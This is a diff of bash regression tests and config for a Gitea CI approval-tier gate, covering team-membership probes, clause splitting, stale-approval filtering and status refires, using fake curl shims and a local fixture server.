for a in "$@"; do
|
||||
case "$prev" in
|
||||
-o) out="$a" ;;
|
||||
esac
|
||||
case "$a" in
|
||||
http*://*) url="$a" ;;
|
||||
'%{http_code}') want_code="yes" ;;
|
||||
esac
|
||||
# -w '%{http_code}' arrives as the value of the -w flag
|
||||
if [ "$prev" = "-w" ] && [ "$a" = '%{http_code}' ]; then want_code="yes"; fi
|
||||
prev="$a"
|
||||
done
|
||||
|
||||
# Map URL -> fixture key (a filename-safe slug).
|
||||
# We only need the path after /api/v1.
|
||||
path="${url#*/api/v1}"
|
||||
slug="$(printf '%s' "$path" | tr '/?=&' '____')"
|
||||
|
||||
body_file="$FIXDIR/body${slug}"
|
||||
code_file="$FIXDIR/code${slug}"
|
||||
|
||||
# Emit body to -o target (or capture for stdout) when a body fixture exists.
|
||||
body=""
|
||||
if [ -f "$body_file" ]; then body="$(cat "$body_file")"; fi
|
||||
if [ -n "$out" ]; then
|
||||
printf '%s' "$body" > "$out"
|
||||
else
|
||||
printf '%s' "$body"
|
||||
fi
|
||||
|
||||
# Emit http code when requested.
|
||||
if [ "$want_code" = "yes" ]; then
|
||||
if [ -f "$code_file" ]; then
|
||||
printf '%s' "$(cat "$code_file")"
|
||||
else
|
||||
printf '200'
|
||||
fi
|
||||
fi
|
||||
exit 0
|
||||
FAKE
|
||||
chmod +x "$BIN/curl"
|
||||
echo "$BIN"
|
||||
}
|
||||
|
||||
# Common fixtures shared by scenarios. $1 = FIXDIR, $2 = approver login,
|
||||
# $3 = tier label name (e.g. tier:high), $4 = teams JSON.
|
||||
seed_common() {
|
||||
local FIXDIR="$1" approver="$2" tier="$3" teams_json="$4"
|
||||
mkdir -p "$FIXDIR"
|
||||
# /user -> whoami
|
||||
printf '%s' '{"login":"sop-bot"}' > "$FIXDIR/body_user"
|
||||
# PR head sha
|
||||
printf '%s' '{"head":{"sha":"headsha1"}}' \
|
||||
> "$FIXDIR/body_repos_molecule-ai_molecule-core_pulls_42"
|
||||
# labels
|
||||
printf '%s' "[{\"name\":\"$tier\"}]" \
|
||||
> "$FIXDIR/body_repos_molecule-ai_molecule-core_issues_42_labels"
|
||||
# org teams list
|
||||
printf '%s' "$teams_json" > "$FIXDIR/body_orgs_molecule-ai_teams"
|
||||
printf '%s' '200' > "$FIXDIR/code_orgs_molecule-ai_teams"
|
||||
# reviews: one APPROVED on current head by $approver
|
||||
printf '%s' "[{\"state\":\"APPROVED\",\"commit_id\":\"headsha1\",\"user\":{\"login\":\"$approver\"}}]" \
|
||||
> "$FIXDIR/body_repos_molecule-ai_molecule-core_pulls_42_reviews"
|
||||
}
|
||||
|
||||
run_script() {
|
||||
# $1 = FIXDIR (must contain bin/curl). Returns combined stdout+stderr; sets RC.
|
||||
local FIXDIR="$1"
|
||||
local BIN="$FIXDIR/bin"
|
||||
set +e
|
||||
OUT=$(
|
||||
SOP_TEST_FIXDIR="$FIXDIR" \
|
||||
PATH="$BIN:$PATH" \
|
||||
GITEA_TOKEN="faketoken" \
|
||||
GITEA_HOST="git.moleculesai.app" \
|
||||
REPO="molecule-ai/molecule-core" \
|
||||
PR_NUMBER="42" \
|
||||
PR_AUTHOR="pr-author" \
|
||||
SOP_DEBUG="0" \
|
||||
SOP_LEGACY_CHECK="0" \
|
||||
"$BASH4" "$SCRIPT" 2>&1
|
||||
)
|
||||
RC=$?
|
||||
set -e
|
||||
printf '%s' "$OUT"
|
||||
return $RC
|
||||
}
|
||||
|
||||
TEAMS_JSON='[{"name":"ceo","id":10},{"name":"engineers","id":11},{"name":"managers","id":12}]'
|
||||
|
||||
echo "=============================================================="
|
||||
echo "Scenario 1: tier:high, team probe 403 (cannot read), approver"
|
||||
echo " is a plain org member but NOT in ceo team."
|
||||
echo " EXPECT: tier NOT granted (fail-closed cannot-verify)."
|
||||
echo "=============================================================="
|
||||
S1="$(mktemp -d)"
|
||||
make_harness "$S1" >/dev/null
|
||||
seed_common "$S1" "org-only-bob" "tier:high" "$TEAMS_JSON"
|
||||
# Team membership probe for ceo (id=10) returns 403 — cannot read.
|
||||
printf '%s' '403' > "$S1/code_teams_10_members_org-only-bob"
|
||||
# The OLD bug path: org membership probe would 204 and synthetic-credit.
|
||||
printf '%s' '204' > "$S1/code_orgs_molecule-ai_members_org-only-bob"
|
||||
set +e
|
||||
OUT1="$(run_script "$S1")"; RC1=$?
|
||||
set -e
|
||||
echo "$OUT1" | sed 's/^/ /'
|
||||
echo " (exit=$RC1)"
|
||||
assert_eq "S1 exit non-zero (tier NOT granted)" "1" "$([ "$RC1" -ne 0 ] && echo 1 || echo 0)"
|
||||
assert_not_contains "S1 did NOT print PASSED" "$OUT1" "sop-tier-check PASSED"
|
||||
assert_contains "S1 cannot-verify error surfaced" "$OUT1" "CANNOT VERIFY"
|
||||
assert_contains "S1 names the unreadable probe (403)" "$OUT1" "HTTP 403"
|
||||
rm -rf "$S1"
|
||||
|
||||
echo
|
||||
echo "=============================================================="
|
||||
echo "Scenario 2: tier:high, genuine ceo team member (probe 204)."
|
||||
echo " EXPECT: tier GRANTED."
|
||||
echo "=============================================================="
|
||||
S2="$(mktemp -d)"
|
||||
make_harness "$S2" >/dev/null
|
||||
seed_common "$S2" "real-ceo" "tier:high" "$TEAMS_JSON"
|
||||
printf '%s' '204' > "$S2/code_teams_10_members_real-ceo" # ceo team: member
|
||||
set +e
|
||||
OUT2="$(run_script "$S2")"; RC2=$?
|
||||
set -e
|
||||
echo "$OUT2" | sed 's/^/ /'
|
||||
echo " (exit=$RC2)"
|
||||
assert_eq "S2 exit zero (granted)" "0" "$RC2"
|
||||
assert_contains "S2 printed PASSED" "$OUT2" "sop-tier-check PASSED"
|
||||
rm -rf "$S2"
|
||||
|
||||
echo
|
||||
echo "=============================================================="
|
||||
echo "Scenario 3: tier:high, approver is an org member but a VERIFIED"
|
||||
echo " non-member of ceo (team probe 404). Org probe would"
|
||||
echo " 204 — must NEVER be synthetic-credited."
|
||||
echo " EXPECT: tier NOT granted (clause FAIL), no fallback."
|
||||
echo "=============================================================="
|
||||
S3="$(mktemp -d)"
|
||||
make_harness "$S3" >/dev/null
|
||||
seed_common "$S3" "org-member-carol" "tier:high" "$TEAMS_JSON"
|
||||
printf '%s' '404' > "$S3/code_teams_10_members_org-member-carol" # verified NOT in ceo
|
||||
printf '%s' '204' > "$S3/code_orgs_molecule-ai_members_org-member-carol" # org member (must be ignored)
|
||||
set +e
|
||||
OUT3="$(run_script "$S3")"; RC3=$?
|
||||
set -e
|
||||
echo "$OUT3" | sed 's/^/ /'
|
||||
echo " (exit=$RC3)"
|
||||
assert_eq "S3 exit non-zero (tier NOT granted)" "1" "$([ "$RC3" -ne 0 ] && echo 1 || echo 0)"
|
||||
assert_not_contains "S3 did NOT print PASSED" "$OUT3" "sop-tier-check PASSED"
|
||||
assert_contains "S3 reported a real clause FAIL (not cannot-verify)" "$OUT3" "FAILED for tier:high"
|
||||
assert_not_contains "S3 did NOT cannot-verify (404 is a verified negative)" "$OUT3" "CANNOT VERIFY"
|
||||
rm -rf "$S3"
|
||||
|
||||
echo
|
||||
echo "------"
|
||||
echo "PASS=$PASS FAIL=$FAIL"
|
||||
[ "$FAIL" -eq 0 ]
|
||||
@@ -1,101 +0,0 @@
|
||||
#!/usr/bin/env bash
|
||||
# Regression test for #229 — sop-tier-check tier:low OR-clause splitter.
|
||||
#
|
||||
# Bug (PR #225 → still broken after PR #231):
|
||||
# Line ~289 of sop-tier-check.sh used:
|
||||
# _clause=$(echo "$_raw_clause" | tr -d '()' | tr ',' '\n' | tr -d '[:space:]' | grep -v '^$')
|
||||
# `tr -d '[:space:]'` strips the newlines that `tr ',' '\n'` just
|
||||
# inserted, collapsing "engineers,managers,ceo" into a single token
|
||||
# "engineersmanagersceo". The for-loop then iterates ONCE on a name
|
||||
# that matches no team, so every tier:low PR fails:
|
||||
# ::error::clause [engineers/managers/ceo]: FAIL — no approving
|
||||
# reviewer belongs to any of these teamsengineersmanagersceo
|
||||
# (note also: missing separators in the error string is bug #2 —
|
||||
# `_clause_names` used "${var:+, }$x" which OVERWRITES per iteration).
|
||||
#
|
||||
# Fix shape (this PR):
|
||||
# _no_parens=${_raw_clause//[()]/}
|
||||
# _clause=${_no_parens//,/ } # comma -> space, bash word-split iterates
|
||||
# _clause_names="${_clause_names}${_clause_names:+, }${_t}" # APPEND, not overwrite
|
||||
#
|
||||
# This test extracts the splitter logic and asserts it produces the right
|
||||
# token list for each of the three tier expressions live in the script.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
PASS=0
|
||||
FAIL=0
|
||||
|
||||
assert_eq() {
|
||||
local label="$1"
|
||||
local expected="$2"
|
||||
local got="$3"
|
||||
if [ "$expected" = "$got" ]; then
|
||||
echo " PASS $label"
|
||||
PASS=$((PASS + 1))
|
||||
else
|
||||
echo " FAIL $label"
|
||||
echo " expected: <$expected>"
|
||||
echo " got: <$got>"
|
||||
FAIL=$((FAIL + 1))
|
||||
fi
|
||||
}
|
||||
|
||||
# ----- Splitter under test (mirrors the fixed sop-tier-check.sh block) -----
|
||||
split_clause() {
|
||||
local raw="$1"
|
||||
local no_parens=${raw//[()]/}
|
||||
local clause=${no_parens//,/ }
|
||||
local out=""
|
||||
for _t in $clause; do
|
||||
out="${out}${out:+|}$_t"
|
||||
done
|
||||
echo "$out"
|
||||
}
|
||||
|
||||
echo "test: tier:low OR-clause splits to 3 tokens"
|
||||
assert_eq "tier:low" "engineers|managers|ceo" "$(split_clause "engineers,managers,ceo")"
|
||||
|
||||
echo "test: tier:medium AND-expression — bash word-split on \$EXPR yields 5 tokens"
|
||||
EXPR="managers AND engineers AND qa,security"
|
||||
out=""
|
||||
for _raw in $EXPR; do
|
||||
out="${out}${out:+ ; }$(split_clause "$_raw")"
|
||||
done
|
||||
assert_eq "tier:medium" "managers ; AND ; engineers ; AND ; qa|security" "$out"
|
||||
|
||||
echo "test: tier:high single-team OR-clause"
|
||||
assert_eq "tier:high" "ceo" "$(split_clause "ceo")"
|
||||
|
||||
echo "test: paren-wrapped OR-set unwraps + splits"
|
||||
assert_eq "paren OR" "managers|ceo" "$(split_clause "(managers,ceo)")"
|
||||
|
||||
# ----- _clause_names accumulator (was overwriting per iteration) -----
|
||||
acc=""
|
||||
for t in engineers managers ceo; do
|
||||
acc="${acc}${acc:+, }${t}"
|
||||
done
|
||||
assert_eq "_clause_names append" "engineers, managers, ceo" "$acc"
|
||||
|
||||
# ----- _failed_clauses / _passed_clauses accumulator across raw clauses -----
|
||||
acc=""
|
||||
for c in clauseA clauseB clauseC; do
|
||||
acc="${acc}${acc:+, }${c}"
|
||||
done
|
||||
assert_eq "_failed_clauses append" "clauseA, clauseB, clauseC" "$acc"
|
||||
|
||||
# ----- End-to-end OR-gate: simulate APPROVER_TEAMS[core-lead]=' managers ' -----
|
||||
# The script's case pattern is *${_t}* with a space-padded value.
|
||||
APPROVER_TEAMS_VAL=" managers "
|
||||
matched=""
|
||||
for _t in $(split_clause "engineers,managers,ceo" | tr '|' ' '); do
|
||||
case "$APPROVER_TEAMS_VAL" in
|
||||
*${_t}*) matched="$_t"; break ;;
|
||||
esac
|
||||
done
|
||||
assert_eq "OR-gate matches managers" "managers" "$matched"
|
||||
|
||||
echo
|
||||
echo "------"
|
||||
echo "PASS=$PASS FAIL=$FAIL"
|
||||
[ "$FAIL" -eq 0 ]
|
||||
@@ -1,66 +0,0 @@
|
||||
#!/usr/bin/env bash
|
||||
# Regression test for internal#816 — sop-tier-check must ignore APPROVED
|
||||
# reviews that were submitted against an old PR head SHA.
|
||||
#
|
||||
# Bug: the script collected approvers with
|
||||
# jq '[.[] | select(.state=="APPROVED") | .user.login]'
|
||||
# without filtering on .commit_id == HEAD_SHA. After a PR head moved,
|
||||
# stale approvals looked valid to the tier gate.
|
||||
#
|
||||
# Fix: the jq filter now includes
|
||||
# select(.state=="APPROVED" and .commit_id == $head_sha)
|
||||
# where $head_sha is the current PR head fetched from the API.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
# jq may not be on PATH in all environments (e.g. dev containers).
|
||||
PATH="/tmp/bin:$PATH"
|
||||
command -v jq >/dev/null 2>&1 || { echo "::error::jq required but not found"; exit 1; }
|
||||
|
||||
PASS=0
|
||||
FAIL=0
|
||||
|
||||
assert_eq() {
|
||||
local label="$1"
|
||||
local expected="$2"
|
||||
local got="$3"
|
||||
if [ "$expected" = "$got" ]; then
|
||||
echo " PASS $label"
|
||||
PASS=$((PASS + 1))
|
||||
else
|
||||
echo " FAIL $label"
|
||||
echo " expected: <$expected>"
|
||||
echo " got: <$got>"
|
||||
FAIL=$((FAIL + 1))
|
||||
fi
|
||||
}
|
||||
|
||||
# Sample reviews matching the shape from Gitea API
|
||||
REVIEWS_JSON='[
|
||||
{"state":"APPROVED","commit_id":"abc123","user":{"login":"bob"}},
|
||||
{"state":"APPROVED","commit_id":"old456","user":{"login":"alice"}},
|
||||
{"state":"COMMENT","commit_id":"abc123","user":{"login":"carol"}},
|
||||
{"state":"APPROVED","commit_id":"abc123","user":{"login":"dave"}},
|
||||
{"state":"REQUEST_CHANGES","commit_id":"abc123","user":{"login":"eve"}}
|
||||
]'
|
||||
|
||||
echo "test: jq filter keeps only APPROVED on current head"
|
||||
GOT=$(echo "$REVIEWS_JSON" | jq -r --arg head_sha "abc123" \
|
||||
'[.[] | select(.state=="APPROVED" and .commit_id == $head_sha) | .user.login] | unique | .[]')
|
||||
assert_eq "current-head approvers" "bob dave" "$(echo "$GOT" | tr '\n' ' ' | sed 's/ $//')"
|
||||
|
||||
echo "test: jq filter with all-stale reviews yields empty"
|
||||
GOT=$(echo "$REVIEWS_JSON" | jq -r --arg head_sha "new789" \
|
||||
'[.[] | select(.state=="APPROVED" and .commit_id == $head_sha) | .user.login] | unique | .[]')
|
||||
assert_eq "all-stale yields empty" "" "$GOT"
|
||||
|
||||
echo "test: jq filter handles null commit_id gracefully"
|
||||
NULL_JSON='[{"state":"APPROVED","commit_id":null,"user":{"login":"mallory"}}]'
|
||||
GOT=$(echo "$NULL_JSON" | jq -r --arg head_sha "abc123" \
|
||||
'[.[] | select(.state=="APPROVED" and .commit_id == $head_sha) | .user.login] | unique | .[]')
|
||||
assert_eq "null commit_id excluded" "" "$GOT"
|
||||
|
||||
echo
|
||||
echo "------"
|
||||
echo "PASS=$PASS FAIL=$FAIL"
|
||||
[ "$FAIL" -eq 0 ]
|
||||
@@ -1,304 +0,0 @@
|
||||
#!/usr/bin/env bash
|
||||
# Tests for sop-tier-refire.{yml,sh} — internal#292.
|
||||
#
|
||||
# Behavior matrix:
|
||||
#
|
||||
# T1: PR open + APPROVED via tier:low → script invokes sop-tier-check
|
||||
# and POSTs status=success.
|
||||
# T2: PR open + missing tier label → sop-tier-check exits non-zero;
|
||||
# refire still POSTs status=success, matching the canonical
|
||||
# pull_request_target workflow's fail-open job conclusion.
|
||||
# T3: PR open + tier:low but NO approving reviews → sop-tier-check
|
||||
# exits non-zero; refire still POSTs status=success for the same reason.
|
||||
# T4: PR CLOSED → refire exits 0 with no status POST (no-op on closed).
|
||||
# T5: Rate-limit — recent status update within 30s → refire skips,
|
||||
# no new POST.
|
||||
# T6 (yaml-lint): workflow `if:` expression contains author_association
|
||||
# gate + slash-command-trigger gate + PR-not-issue gate.
|
||||
# T7 (yaml-lint): workflow file is parseable YAML.
|
||||
#
|
||||
# Tests T1-T5 run the real script against a local-fixture HTTP server
|
||||
# (python http.server with a stub handler — `tests/_refire_fixture.py`)
|
||||
# so the script's Gitea API calls hit the fixture, not the real Gitea.
|
||||
#
|
||||
# Tests T6/T7 are pure YAML checks against the workflow file.
|
||||
#
|
||||
# Hostile-self-review (per feedback_assert_exact_not_substring):
|
||||
# this test MUST FAIL if the workflow or script is absent. Verified by
|
||||
# running the test before the files exist (covered in the PR body).
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
THIS_DIR="$(cd "$(dirname "$0")" && pwd)"
|
||||
SCRIPT_DIR="$(cd "$THIS_DIR/.." && pwd)"
|
||||
WORKFLOW_DIR="$(cd "$THIS_DIR/../../workflows" && pwd)"
|
||||
WORKFLOW="$WORKFLOW_DIR/sop-tier-refire.yml"
|
||||
DISPATCH_WORKFLOW="$WORKFLOW_DIR/sop-checklist.yml"
|
||||
SCRIPT="$SCRIPT_DIR/sop-tier-refire.sh"
|
||||
|
||||
PASS=0
|
||||
FAIL=0
|
||||
FAILED_TESTS=""
|
||||
|
||||
assert_eq() {
|
||||
local label="$1"
|
||||
local expected="$2"
|
||||
local got="$3"
|
||||
if [ "$expected" = "$got" ]; then
|
||||
echo " PASS $label"
|
||||
PASS=$((PASS + 1))
|
||||
else
|
||||
echo " FAIL $label"
|
||||
echo " expected: <$expected>"
|
||||
echo " got: <$got>"
|
||||
FAIL=$((FAIL + 1))
|
||||
FAILED_TESTS="${FAILED_TESTS} ${label}"
|
||||
fi
|
||||
}
|
||||
|
||||
assert_contains() {
|
||||
local label="$1"
|
||||
local needle="$2"
|
||||
local haystack="$3"
|
||||
if printf '%s' "$haystack" | grep -qF "$needle"; then
|
||||
echo " PASS $label"
|
||||
PASS=$((PASS + 1))
|
||||
else
|
||||
echo " FAIL $label"
|
||||
echo " needle: <$needle>"
|
||||
echo " haystack: <$(printf '%s' "$haystack" | head -c 400)>"
|
||||
FAIL=$((FAIL + 1))
|
||||
FAILED_TESTS="${FAILED_TESTS} ${label}"
|
||||
fi
|
||||
}
|
||||
|
||||
assert_file_exists() {
|
||||
local label="$1"
|
||||
local path="$2"
|
||||
if [ -f "$path" ]; then
|
||||
echo " PASS $label"
|
||||
PASS=$((PASS + 1))
|
||||
else
|
||||
echo " FAIL $label (not found: $path)"
|
||||
FAIL=$((FAIL + 1))
|
||||
FAILED_TESTS="${FAILED_TESTS} ${label}"
|
||||
fi
|
||||
}
|
||||
|
||||
# Existence (foundation — every other test depends on these)
|
||||
echo
|
||||
echo "== existence =="
|
||||
assert_file_exists "workflow file exists" "$WORKFLOW"
|
||||
assert_file_exists "SSOT dispatcher workflow file exists" "$DISPATCH_WORKFLOW"
|
||||
assert_file_exists "script file exists" "$SCRIPT"
|
||||
if [ "$FAIL" -gt 0 ]; then
|
||||
echo
|
||||
echo "------"
|
||||
echo "PASS=$PASS FAIL=$FAIL (existence)"
|
||||
echo "Cannot proceed without these files."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# T6 / T7 — workflow YAML structure
|
||||
echo
|
||||
echo "== T6/T7 workflow yaml =="
|
||||
|
||||
# YAML parseability
|
||||
PARSE_OUT=$(python3 -c 'import sys,yaml;yaml.safe_load(open(sys.argv[1]).read());print("ok")' "$WORKFLOW" 2>&1 || true)
|
||||
assert_eq "T7 workflow parses as YAML" "ok" "$PARSE_OUT"
|
||||
|
||||
# The old per-workflow issue_comment listener caused queue storms because
|
||||
# Gitea queues jobs before evaluating job-level `if:`. The script remains,
|
||||
# but comment-triggered refires route through the single dispatcher.
|
||||
WORKFLOW_CONTENT=$(cat "$WORKFLOW")
|
||||
if printf '%s' "$WORKFLOW_CONTENT" | grep -q '^ issue_comment:'; then
|
||||
echo " FAIL T6a manual fallback workflow must not listen on issue_comment"
|
||||
FAIL=$((FAIL + 1))
|
||||
FAILED_TESTS="${FAILED_TESTS} T6a"
|
||||
else
|
||||
echo " PASS T6a manual fallback workflow does not listen on issue_comment"
|
||||
PASS=$((PASS + 1))
|
||||
fi
|
||||
assert_contains "T6b workflow exposes workflow_dispatch" \
|
||||
"workflow_dispatch" "$WORKFLOW_CONTENT"
|
||||
assert_contains "T6c workflow documents unsupported manual inputs" \
|
||||
"workflow_dispatch inputs" "$WORKFLOW_CONTENT"
|
||||
# Does NOT check out PR HEAD (security)
|
||||
if grep -q 'ref: \${{ github.event.pull_request.head' "$WORKFLOW"; then
|
||||
echo " FAIL T6d workflow MUST NOT check out PR head (security)"
|
||||
FAIL=$((FAIL + 1))
|
||||
FAILED_TESTS="${FAILED_TESTS} T6d"
|
||||
else
|
||||
echo " PASS T6d workflow does not check out PR head"
|
||||
PASS=$((PASS + 1))
|
||||
fi
|
||||
|
||||
DISPATCH_PARSE_OUT=$(python3 -c 'import sys,yaml;yaml.safe_load(open(sys.argv[1]).read());print("ok")' "$DISPATCH_WORKFLOW" 2>&1 || true)
|
||||
assert_eq "T6e SSOT dispatcher workflow parses as YAML" "ok" "$DISPATCH_PARSE_OUT"
|
||||
DISPATCH_CONTENT=$(cat "$DISPATCH_WORKFLOW")
|
||||
assert_contains "T6f SSOT dispatcher listens on issue_comment" \
|
||||
"issue_comment" "$DISPATCH_CONTENT"
|
||||
assert_contains "T6g SSOT dispatcher handles /qa-recheck" \
|
||||
"/qa-recheck" "$DISPATCH_CONTENT"
|
||||
assert_contains "T6h SSOT dispatcher handles /security-recheck" \
|
||||
"/security-recheck" "$DISPATCH_CONTENT"
|
||||
assert_contains "T6i SSOT dispatcher handles /refire-tier-check" \
|
||||
"/refire-tier-check" "$DISPATCH_CONTENT"
|
||||
|
||||
# T1-T5 — script behavior against a local Gitea-fixture
|
||||
echo
|
||||
echo "== T1-T5 script behavior (vs local fixture) =="
|
||||
|
||||
# Spin up the fixture HTTP server.
|
||||
FIXTURE_DIR=$(mktemp -d)
|
||||
trap 'rm -rf "$FIXTURE_DIR"; [ -n "${FIX_PID:-}" ] && kill "$FIX_PID" 2>/dev/null || true' EXIT
|
||||
FIXTURE_PY="$THIS_DIR/_refire_fixture.py"
|
||||
if [ ! -f "$FIXTURE_PY" ]; then
|
||||
echo "::error::fixture server $FIXTURE_PY missing"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
FIX_LOG="$FIXTURE_DIR/fixture.log"
|
||||
FIX_STATE_DIR="$FIXTURE_DIR/state"
|
||||
mkdir -p "$FIX_STATE_DIR"
|
||||
|
||||
# Find an unused port.
|
||||
FIX_PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("127.0.0.1",0));print(s.getsockname()[1]);s.close()')
|
||||
|
||||
FIXTURE_STATE_DIR="$FIX_STATE_DIR" python3 "$FIXTURE_PY" "$FIX_PORT" \
|
||||
>"$FIX_LOG" 2>&1 &
|
||||
FIX_PID=$!
|
||||
|
||||
# Wait for fixture readiness.
|
||||
for _ in $(seq 1 50); do
|
||||
if curl -fsS "http://127.0.0.1:${FIX_PORT}/_ping" >/dev/null 2>&1; then
|
||||
break
|
||||
fi
|
||||
sleep 0.1
|
||||
done
|
||||
if ! curl -fsS "http://127.0.0.1:${FIX_PORT}/_ping" >/dev/null 2>&1; then
|
||||
echo "::error::fixture server failed to start. Log:"
|
||||
cat "$FIX_LOG"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Helper: set fixture state for a scenario, then run the script.
|
||||
# tier_result is one of: pass | fail_no_label | fail_no_approvals.
|
||||
# The refire script's tier-check invocation is mocked because the real
|
||||
# sop-tier-check.sh uses bash 4+ associative arrays — incompatible with
|
||||
# the macOS bash 3.2 dev shell. Linux Gitea runners use bash 4/5 so
|
||||
# production runs the real script. The mock exercises the success +
|
||||
# failure branches of refire's status-POST glue.
|
||||
run_scenario() {
|
||||
local scenario="$1"
|
||||
local tier_result="${2:-pass}"
|
||||
echo "$scenario" >"$FIX_STATE_DIR/scenario"
|
||||
: >"$FIX_STATE_DIR/posted_statuses.jsonl" # clear status log
|
||||
|
||||
local out
|
||||
set +e
|
||||
out=$(
|
||||
PATH="$FIXTURE_DIR/bin:$PATH" \
|
||||
GITEA_TOKEN="fixture-token" \
|
||||
GITEA_HOST="fixture.local" \
|
||||
REPO="molecule-ai/molecule-core" \
|
||||
PR_NUMBER="999" \
|
||||
COMMENT_AUTHOR="test-runner" \
|
||||
SOP_REFIRE_DISABLE_RATE_LIMIT="1" \
|
||||
SOP_REFIRE_TIER_CHECK_SCRIPT="$THIS_DIR/_mock_tier_check.sh" \
|
||||
MOCK_TIER_RESULT="$tier_result" \
|
||||
FIXTURE_PORT="$FIX_PORT" \
|
||||
bash "$SCRIPT" 2>&1
|
||||
)
|
||||
local rc=$?
|
||||
set -e
|
||||
echo "$out" >"$FIX_STATE_DIR/last_run.log"
|
||||
echo "$rc" >"$FIX_STATE_DIR/last_rc"
|
||||
}
|
||||
|
||||
# Install a curl shim that rewrites https://fixture.local → http://127.0.0.1:$PORT
|
||||
# Use bash prefix-strip (${var#prefix}) — it sidesteps the `/` delimiter
|
||||
# confusion of ${var/pattern/replacement}.
|
||||
mkdir -p "$FIXTURE_DIR/bin"
|
||||
cat >"$FIXTURE_DIR/bin/curl" <<SHIM
|
||||
#!/usr/bin/env bash
|
||||
# Test shim: rewrite https://fixture.local/* -> http://127.0.0.1:${FIX_PORT}/*
|
||||
# The fixture doesn't authenticate; -H Authorization passes through harmlessly.
|
||||
new_args=()
|
||||
for a in "\$@"; do
|
||||
if [[ "\$a" == https://fixture.local/* ]]; then
|
||||
rest="\${a#https://fixture.local}"
|
||||
a="http://127.0.0.1:${FIX_PORT}\${rest}"
|
||||
fi
|
||||
new_args+=("\$a")
|
||||
done
|
||||
exec /usr/bin/curl "\${new_args[@]}"
|
||||
SHIM
|
||||
chmod +x "$FIXTURE_DIR/bin/curl"
|
||||
|
||||
# T1: tier:low + 1 APPROVED + author is in engineers team → success
|
||||
run_scenario "T1_success" "pass"
|
||||
RC=$(cat "$FIX_STATE_DIR/last_rc")
|
||||
POSTED=$(cat "$FIX_STATE_DIR/posted_statuses.jsonl" 2>/dev/null || true)
|
||||
assert_eq "T1 exit code 0 (success)" "0" "$RC"
|
||||
assert_contains "T1 POSTed state=success" '"state": "success"' "$POSTED"
|
||||
assert_contains "T1 POST context is sop-tier-check / tier-check" \
|
||||
'"context": "sop-tier-check / tier-check (pull_request)"' "$POSTED"
|
||||
assert_contains "T1 description names commenter" "test-runner" "$POSTED"
|
||||
|
||||
# T2: missing tier label → tier-check fails internally (mock exits 1).
|
||||
# FAIL-CLOSED contract (fix/core-ci-fail-closed): refire now captures the
|
||||
# REAL exit code and POSTs state=failure — it does NOT forge a green on
|
||||
# the required context. The refire job itself still exits 0 (it succeeded
|
||||
# at posting an honest failure status).
|
||||
run_scenario "T2_no_tier_label" "fail_no_label"
|
||||
RC=$(cat "$FIX_STATE_DIR/last_rc")
|
||||
POSTED=$(cat "$FIX_STATE_DIR/posted_statuses.jsonl" 2>/dev/null || true)
|
||||
assert_eq "T2 exit code 0 (posted an honest status)" "0" "$RC"
|
||||
assert_contains "T2 POSTed state=failure (no forged green)" '"state": "failure"' "$POSTED"
|
||||
|
||||
# T3: tier:low present but ZERO approving reviews → internal tier check
|
||||
# fails (mock exits 1). Refire POSTs state=failure, never a false green.
|
||||
run_scenario "T3_no_approvals" "fail_no_approvals"
|
||||
RC=$(cat "$FIX_STATE_DIR/last_rc")
|
||||
POSTED=$(cat "$FIX_STATE_DIR/posted_statuses.jsonl" 2>/dev/null || true)
|
||||
assert_eq "T3 exit code 0 (posted an honest status)" "0" "$RC"
|
||||
assert_contains "T3 POSTed state=failure (no forged green)" '"state": "failure"' "$POSTED"
|
||||
|
||||
# T4: closed PR — refire is a no-op (no POST, exit 0)
|
||||
run_scenario "T4_closed" "pass"
|
||||
RC=$(cat "$FIX_STATE_DIR/last_rc")
|
||||
POSTED=$(cat "$FIX_STATE_DIR/posted_statuses.jsonl" 2>/dev/null || true)
|
||||
assert_eq "T4 closed PR exits 0" "0" "$RC"
|
||||
assert_eq "T4 closed PR posts no status" "" "$POSTED"
|
||||
|
||||
# T5: rate-limit — disable the env override and let scenario set a
|
||||
# recent statuses entry. Re-enable rate-limit for this scenario by NOT
|
||||
# passing SOP_REFIRE_DISABLE_RATE_LIMIT.
|
||||
echo "T5_rate_limited" >"$FIX_STATE_DIR/scenario"
|
||||
: >"$FIX_STATE_DIR/posted_statuses.jsonl"
|
||||
set +e
|
||||
T5_OUT=$(
|
||||
PATH="$FIXTURE_DIR/bin:$PATH" \
|
||||
GITEA_TOKEN="fixture-token" \
|
||||
GITEA_HOST="fixture.local" \
|
||||
REPO="molecule-ai/molecule-core" \
|
||||
PR_NUMBER="999" \
|
||||
COMMENT_AUTHOR="test-runner" \
|
||||
FIXTURE_PORT="$FIX_PORT" \
|
||||
bash "$SCRIPT" 2>&1
|
||||
)
|
||||
T5_RC=$?
|
||||
set -e
|
||||
POSTED=$(cat "$FIX_STATE_DIR/posted_statuses.jsonl" 2>/dev/null || true)
|
||||
assert_eq "T5 rate-limited exits 0" "0" "$T5_RC"
|
||||
assert_contains "T5 rate-limited log says skipped" "rate-limited" "$T5_OUT"
|
||||
assert_eq "T5 rate-limited posts no status" "" "$POSTED"
|
||||
|
||||
echo
|
||||
echo "------"
|
||||
echo "PASS=$PASS FAIL=$FAIL"
|
||||
if [ "$FAIL" -gt 0 ]; then
|
||||
echo "Failed:$FAILED_TESTS"
|
||||
fi
|
||||
[ "$FAIL" -eq 0 ]
|
||||
@@ -55,38 +55,22 @@
|
||||
|
||||
version: 1
|
||||
|
||||
# Tier-aware failure mode (RFC#351 open question 2):
|
||||
# For tier:high — hard-fail (status `failure`, blocks merge via BP).
|
||||
# For tier:medium — hard-fail (same as high; medium is non-trivial).
|
||||
# For tier:low — soft-fail (status `pending` with `acked: N/M` in the
|
||||
# description). BP can choose to require the context
|
||||
# or not for low-tier PRs.
|
||||
# If no tier label is present, default to medium (hard-fail) — every PR
|
||||
# should have a tier label per sop-tier-check, and absence indicates
|
||||
# a missing-tier defect we should surface, not silently lower the bar.
|
||||
tier_failure_mode:
|
||||
"tier:high": hard
|
||||
"tier:medium": hard
|
||||
"tier:low": soft
|
||||
default_mode: hard # used when no tier:* label is present
|
||||
# Uniform hard-fail mode (CTO 2026-06-07):
|
||||
# Every PR uses the same gate — no tier branching.
|
||||
# Missing acks → status `failure`, blocks merge via branch protection.
|
||||
